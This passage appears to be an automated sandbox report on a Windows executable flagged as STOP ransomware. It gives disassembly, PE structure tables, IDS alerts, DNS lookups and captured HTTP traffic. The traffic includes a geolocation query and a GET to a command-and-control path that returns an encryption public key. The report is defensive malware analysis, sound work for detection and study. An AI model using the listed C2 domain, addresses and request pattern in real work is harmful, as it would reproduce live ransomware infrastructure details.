                                                                                                cmp word ptr [00400000h], ax
                                                                                                je 00007FEB0CF6DE86h
                                                                                                xor ebx, ebx
                                                                                                jmp 00007FEB0CF6DEB5h
                                                                                                mov eax, dword ptr [0040003Ch]
                                                                                                cmp dword ptr [eax+00400000h], 00004550h
                                                                                                jne 00007FEB0CF6DE6Dh
                                                                                                mov ecx, 0000010Bh
                                                                                                cmp word ptr [eax+00400018h], cx
                                                                                                jne 00007FEB0CF6DE5Fh
                                                                                                xor ebx, ebx
                                                                                                cmp dword ptr [eax+00400074h], 0Eh
                                                                                                jbe 00007FEB0CF6DE8Bh
                                                                                                cmp dword ptr [eax+004000E8h], ebx
                                                                                                setne bl
                                                                                                mov dword ptr [ebp-1Ch], ebx
                                                                                                call 00007FEB0CF6F525h
                                                                                                test eax, eax
                                                                                                jne 00007FEB0CF6DE8Ah
                                                                                                push 0000001Ch
                                                                                                call 00007FEB0CF6DF61h
                                                                                                pop ecx
                                                                                                call 00007FEB0CF734CDh
                                                                                                test eax, eax
                                                                                                jne 00007FEB0CF6DE8Ah
                                                                                                push 00000010h
                                                                                                call 00007FEB0CF6DF50h
                                                                                                pop ecx
                                                                                                call 00007FEB0CF73948h
                                                                                                and dword ptr [ebp-04h], 00000000h
                                                                                                call 00007FEB0CF71331h
                                                                                                test eax, eax
                                                                                                jns 00007FEB0CF6DE8Ah
                                                                                                push 0000001Bh
                                                                                                call 00007FEB0CF6DF36h
                                                                                                pop ecx
                                                                                                call dword ptr [004120B8h]
                                                                                                mov dword ptr [040A0D24h], eax
                                                                                                call 00007FEB0CF73963h
                                                                                                mov dword ptr [004B326Ch], eax
                                                                                                call 00007FEB0CF73520h
                                                                                                test eax, eax
                                                                                                jns 00007FEB0CF6DE8Ah
                                                                                                Programming Language:
                                                                                                • [ASM] VS2013 build 21005
                                                                                                • [ C ] VS2013 build 21005
                                                                                                • [C++] VS2013 build 21005
                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                • [RES] VS2013 build 21005
                                                                                                • [LNK] VS2013 UPD5 build 40629
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x19e04 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3ca1000 | 0xd808 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x121f0 | 0x38 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x19320 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x12000 | 0x188 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x10255 | 0x10400 | 36768b36f8382e675f946a442aca90a8 | False | 0.5994140625 | data | 6.713366444618865 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x12000 | 0x86f0 | 0x8800 | aaf8ee4b39ba21ed0be8528d76840dd5 | False | 0.4509133731617647 | data | 5.094481379870692 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1b000 | 0x3c85d28 | 0x98400 | 5c768537e640232cfbea54e5e98f6f3c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3ca1000 | 0xd808 | 0xda00 | 11e7ba23d48d0bc6146e0f4bfbabc9fa | False | 0.507758744266055 | data | 5.408116554677117 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| AFX_DIALOG_LAYOUT | 0x3cade68 | 0xe | data |  |  | 1.5714285714285714 |
| AFX_DIALOG_LAYOUT | 0x3cade78 | 0xe | data |  |  | 1.5714285714285714 |
| RT_ICON | 0x3ca14d0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Romanian | Romania | 0.5652985074626866 |
| RT_ICON | 0x3ca2378 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Romanian | Romania | 0.5482851985559567 |
| RT_ICON | 0x3ca2c20 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Romanian | Romania | 0.6206647398843931 |
| RT_ICON | 0x3ca3188 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Romanian | Romania | 0.4635892116182573 |
| RT_ICON | 0x3ca5730 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Romanian | Romania | 0.4892120075046904 |
| RT_ICON | 0x3ca67d8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Romanian | Romania | 0.4913934426229508 |
| RT_ICON | 0x3ca7160 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Romanian | Romania | 0.449468085106383 |
| RT_ICON | 0x3ca7630 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Romanian | Romania | 0.4189765458422175 |
| RT_ICON | 0x3ca84d8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Romanian | Romania | 0.47653429602888087 |
| RT_ICON | 0x3ca8d80 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Romanian | Romania | 0.5766129032258065 |
| RT_ICON | 0x3ca9448 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Romanian | Romania | 0.47760115606936415 |
| RT_ICON | 0x3ca99b0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Romanian | Romania | 0.46898340248962656 |
| RT_ICON | 0x3cabf58 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Romanian | Romania | 0.4842870544090056 |
| RT_ICON | 0x3cad000 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Romanian | Romania | 0.5024590163934426 |
| RT_ICON | 0x3cad988 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Romanian | Romania | 0.5593971631205674 |
| RT_STRING | 0x3cae070 | 0x3d2 | data | Romanian | Romania | 0.46319018404907975 |
| RT_STRING | 0x3cae448 | 0x3bc | data | Romanian | Romania | 0.4592050209205021 |
| RT_GROUP_ICON | 0x3ca75c8 | 0x68 | data | Romanian | Romania | 0.6923076923076923 |
| RT_GROUP_ICON | 0x3caddf0 | 0x76 | data | Romanian | Romania | 0.6779661016949152 |
| RT_VERSION | 0x3cade88 | 0x1e4 | data |  |  | 0.5392561983471075 |

| DLL | Import |
|---|---|
| KERNEL32.dll | LocalCompact, GetComputerNameW, CreateHardLinkA, BackupSeek, GetTickCount, GetConsoleAliasesA, GetWindowsDirectoryA, EnumTimeFormatsA, GetUserDefaultLangID, SetCommState, LoadLibraryW, GetLocaleInfoW, ReadConsoleInputA, WriteConsoleW, GetModuleFileNameW, MultiByteToWideChar, GetTempPathW, InterlockedExchange, GetLastError, FindResourceExW, SetLastError, GetThreadLocale, GetProcAddress, SetFileAttributesA, BuildCommDCBW, LoadLibraryA, LocalAlloc, GetExitCodeThread, AddAtomW, RemoveDirectoryW, GlobalFindAtomW, GetOEMCP, GlobalUnWire, LoadLibraryExA, SetCalendarInfoA, GetConsoleProcessList, GetVolumeInformationW, ChangeTimerQueueTimer, GetSystemDefaultLangID, GetStringTypeW, HeapAlloc, EncodePointer, DecodePointer, IsProcessorFeaturePresent, GetCommandLineA, RaiseException, RtlUnwind, IsDebuggerPresent, HeapFree, ExitProcess, GetModuleHandleExW, WideCharToMultiByte, GetStdHandle, WriteFile, GetProcessHeap, EnterCriticalSection, LeaveCriticalSection, FlushFileBuffers, GetConsoleCP, GetConsoleMode, DeleteCriticalSection, HeapSize, GetFileType, GetStartupInfoW, CloseHandle, GetCurrentThreadId, GetModuleFileNameA, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, LoadLibraryExW, IsValidCodePage, GetACP, GetCPInfo, OutputDebugStringW, SetStdHandle, SetFilePointerEx, HeapReAlloc, LCMapStringW, CreateFileW |
| ADVAPI32.dll | DeregisterEventSource |
| WINHTTP.dll | WinHttpOpen |

| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| Romanian | Romania |  |

| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 04/24/24-15:57:00.032327 | TCP | 2833438 | ETPRO TROJAN STOP Ransomware CnC Activity | 49707 | 80 | 192.168.2.5 | 62.150.232.50 |
| 04/24/24-15:57:01.094676 | TCP | 2036335 | ET TROJAN Win32/Filecoder.STOP Variant Public Key Download | 80 | 49707 | 62.150.232.50 | 192.168.2.5 |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Apr 24, 2024 15:56:52.318264961 CEST | 192.168.2.5 | 1.1.1.1 | 0xe57 | Standard query (0) | api.2ip.ua | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 15:56:57.053822994 CEST | 192.168.2.5 | 1.1.1.1 | 0xdc15 | Standard query (0) | cajgtus.com | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 15:56:58.050657988 CEST | 192.168.2.5 | 1.1.1.1 | 0xdc15 | Standard query (0) | cajgtus.com | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 15:56:59.047894001 CEST | 192.168.2.5 | 1.1.1.1 | 0xdc15 | Standard query (0) | cajgtus.com | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Apr 24, 2024 15:56:52.519283056 CEST | 1.1.1.1 | 192.168.2.5 | 0xe57 | No error (0) | api.2ip.ua |  | 104.21.65.24 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 15:56:52.519283056 CEST | 1.1.1.1 | 192.168.2.5 | 0xe57 | No error (0) | api.2ip.ua |  | 172.67.139.220 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 15:56:59.639703989 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc15 | No error (0) | cajgtus.com |  | 62.150.232.50 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 15:56:59.639703989 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc15 | No error (0) | cajgtus.com |  | 201.103.73.225 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 15:56:59.639703989 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc15 | No error (0) | cajgtus.com |  | 211.119.84.111 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 15:56:59.639703989 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc15 | No error (0) | cajgtus.com |  | 190.28.78.114 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 15:56:59.639703989 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc15 | No error (0) | cajgtus.com |  | 211.171.233.129 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 15:56:59.639703989 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc15 | No error (0) | cajgtus.com |  | 189.134.88.74 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 15:56:59.639703989 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc15 | No error (0) | cajgtus.com |  | 175.119.10.231 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 15:56:59.639703989 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc15 | No error (0) | cajgtus.com |  | 186.13.17.220 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 15:56:59.639703989 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc15 | No error (0) | cajgtus.com |  | 217.219.131.81 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 15:56:59.639703989 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc15 | No error (0) | cajgtus.com |  | 186.182.55.44 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 15:56:59.639761925 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc15 | No error (0) | cajgtus.com |  | 62.150.232.50 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 15:56:59.639761925 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc15 | No error (0) | cajgtus.com |  | 201.103.73.225 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 15:56:59.639761925 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc15 | No error (0) | cajgtus.com |  | 211.119.84.111 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 15:56:59.639761925 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc15 | No error (0) | cajgtus.com |  | 190.28.78.114 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 15:56:59.639761925 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc15 | No error (0) | cajgtus.com |  | 211.171.233.129 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 15:56:59.639761925 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc15 | No error (0) | cajgtus.com |  | 189.134.88.74 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 15:56:59.639761925 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc15 | No error (0) | cajgtus.com |  | 175.119.10.231 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 15:56:59.639761925 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc15 | No error (0) | cajgtus.com |  | 186.13.17.220 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 15:56:59.639761925 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc15 | No error (0) | cajgtus.com |  | 217.219.131.81 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 15:56:59.639761925 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc15 | No error (0) | cajgtus.com |  | 186.182.55.44 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 15:56:59.639777899 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc15 | No error (0) | cajgtus.com |  | 62.150.232.50 | A (IP address) | IN (0x0001) | false |
                                                                                                Apr 24, 2024 15:56:59.639777899 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com201.103.73.225A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639777899 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com211.119.84.111A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639777899 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com190.28.78.114A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639777899 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com211.171.233.129A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639777899 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com189.134.88.74A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639777899 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639777899 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com186.13.17.220A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639777899 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com217.219.131.81A (IP address)IN (0x0001)false
                                                                                                Apr 24, 2024 15:56:59.639777899 CEST1.1.1.1192.168.2.50xdc15No error (0)cajgtus.com186.182.55.44A (IP address)IN (0x0001)false
                                                                                                • api.2ip.ua
                                                                                                • cajgtus.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49707 | 62.150.232.50 | 80 | 2164 | C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 15:57:00.032326937 CEST | 128 | OUT | GET /test2/get.php?pid=903E7F261711F85395E5CEFBF4173C54 HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: cajgtus.com
Apr 24, 2024 15:57:01.094676018 CEST | 764 | IN | HTTP/1.1 200 OK
                                                                                                Date: Wed, 24 Apr 2024 13:57:19 GMT
                                                                                                Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                                                                                X-Powered-By: PHP/5.6.40
                                                                                                Content-Length: 560
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Data Ascii: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA443iuR4tYZbKarxLg2U\/\\nydof4gr3PygF4BEuW0IipeRs8Y2Naj7JI9WZ+TVmOpmadPbcR+3b\/+L9aehm+kxm\\nvMXW6Rmhovbl2M2JHqkaQ3wyHwtfR+ZnGKexM\/vU+3f5JgdvdaYEijo\/4pANkKB8\\nR2SB3c72tZ20mm39CVLMyan8neT3+3grdqX9zggAbYBHCH53jQM9B63b+D77rswH\\nSc\/LEmqRXomjw7KXYR0JRF5DflXmm1JBaKxv1dGRTo8wtI0y5TtzbJfzPink7L39\\nEuKBpARLg3gZeW96dT5sA7C8ivMxrH1VBWA6MgiECMs1mBHXp\/lNdJhKu8XX3XFw\\nBQIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 104.21.65.24 | 443 | 2716 | C:\Users\user\Desktop\mU2p71KMss.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-24 13:56:52 UTC | 85 | OUT | GET /geo.json HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: api.2ip.ua
2024-04-24 13:56:53 UTC | 914 | IN | HTTP/1.1 429 Too Many Requests
                                                                                                Date: Wed, 24 Apr 2024 13:56:53 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                strict-transport-security: max-age=63072000; preload
                                                                                                x-frame-options: SAMEORIGIN
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1; mode=block; report=...
                                                                                                access-control-allow-origin: *
                                                                                                access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c%2FQ5Y%2FhZNerCVznLkKnAcnqGQZPd0dFf1847VhwoDd6OmNI2qqCsl1MpTPnVN4XHdx4Y2n9QbSwzgNPQlZR7mr00TvC0zZs3FDnF7atUZbo8pMksDLW%2BZ%2BhA6p3t"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 879699682c062a91-LAX
                                                                                                alt-svc: h3=":443"; ma=86400
2024-04-24 13:56:53 UTC | 455 | IN | Data Ascii: 32f<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#e78f828b97a7d58e97c98a82d89492858d8284
2024-04-24 13:56:53 UTC | 367 | IN | Data Ascii: базе данных. Для получения дополнительной информации, пожалуйста, обращайтеcь по адресу <a href="/cdn-cgi/l/email-protection#d9b1bcb5a999ebb0a9f7acb8e6aaacbbb3bcbaade4ebb0a9f7acb8
2024-04-24 13:56:53 UTC | 114 | IN | Data Ascii: 6c<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script>
2024-04-24 13:56:53 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 104.21.65.24 | 443 | 5968 | C:\Users\user\Desktop\mU2p71KMss.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-24 13:56:54 UTC | 85 | OUT | GET /geo.json HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: api.2ip.ua
2024-04-24 13:56:55 UTC | 912 | IN | HTTP/1.1 429 Too Many Requests
                                                                                                Date: Wed, 24 Apr 2024 13:56:55 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                strict-transport-security: max-age=63072000; preload
                                                                                                x-frame-options: SAMEORIGIN
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1; mode=block; report=...
                                                                                                access-control-allow-origin: *
                                                                                                access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3GYBv0vm7bIGtuASyb%2FIleWMH0CcIrUpOzqfEqQtqUX0x%2BmhGHHGeBSJEsD6QzjVs9SnIY6Dfmqm1KBShXw5b8eWg03JEn%2BblwDuteSRRpThuATLte8CeOn9LJIT"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 879699753b0f2b65-LAX
                                                                                                alt-svc: h3=":443"; ma=86400
2024-04-24 13:56:55 UTC | 457 | IN | Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#98f0fdf4e8d8aaf1e8b6f5fda7ebedfaf2fdfb
2024-04-24 13:56:55 UTC | 473 | IN | Data Ascii: базе данных. Для получения дополнительной информации, пожалуйста, обращайтеcь по адресу <a href="/cdn-cgi/l/email-protection#3f575a534f7f0d564f114a5e004c4a5d555a5c4b020d564f114a5e">
2024-04-24 13:56:55 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49706 | 104.21.65.24 | 443 | 2164 | C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-24 13:56:56 UTC | 85 | OUT | GET /geo.json HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: api.2ip.ua
2024-04-24 13:56:56 UTC | 914 | IN | HTTP/1.1 429 Too Many Requests
                                                                                                Date: Wed, 24 Apr 2024 13:56:56 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                strict-transport-security: max-age=63072000; preload
                                                                                                x-frame-options: SAMEORIGIN
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1; mode=block; report=...
                                                                                                access-control-allow-origin: *
                                                                                                access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ZsxfobyLzVYSt6X3NZtaCostgxIQrKGVqUnMd0XCtewhsxeT5r20l3de%2Ff6dH5xY8E%2B3KN0MgM9nQBlerzwYgnMFQ4ZmhflFyMrdgwq%2BhI%2FQYJ92Gk0xWueKseW"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8796997ceb822ac7-LAX
                                                                                                alt-svc: h3=":443"; ma=86400
2024-04-24 13:56:56 UTC | 455 | IN | Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#f8909d9488b8ca9188d6959dc78b8d9a929d9b
2024-04-24 13:56:56 UTC | 475 | IN | Data Ascii: базе данных. Для получения дополнительной информации, пожалуйста, обращайтеcь по адресу <a href="/cdn-cgi/l/email-protection#c0a8a5acb080f2a9b0eeb5a1ffb3b5a2aaa5a3b4fdf2a9b0eeb5a1
2024-04-24 13:56:56 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49708 | 104.21.65.24 | 443 | 4748 | C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-24 13:57:09 UTC | 85 | OUT | GET /geo.json HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: api.2ip.ua
2024-04-24 13:57:10 UTC | 912 | IN | HTTP/1.1 429 Too Many Requests
                                                                                                Date: Wed, 24 Apr 2024 13:57:09 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                strict-transport-security: max-age=63072000; preload
                                                                                                x-frame-options: SAMEORIGIN
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1; mode=block; report=...
                                                                                                access-control-allow-origin: *
                                                                                                access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U%2Bc6A%2FkgA7ryfPsrqQ8yMzJOY5qasJtBM78rDmVwkK7SxWVzu2IjkCDjB1%2BUej7vqfRGmVl2WGqTkeIACwsZxrHM2namVaM4SgLfnwiEY9syqSYnnnMPSXFyQyTY"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 879699ce9bd52b9e-LAX
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-24 13:57:10 UTC457INData Raw: 33 39 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 33 37 35 66 35 32 35 62 34 37 37 37 30 35 35 65 34 37 31 39 35 61 35 32 30 38 34 34 34 32 35 35 35 64 35 32 35 34
                                                                                                Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#375f525b4777055e47195a52084442555d5254
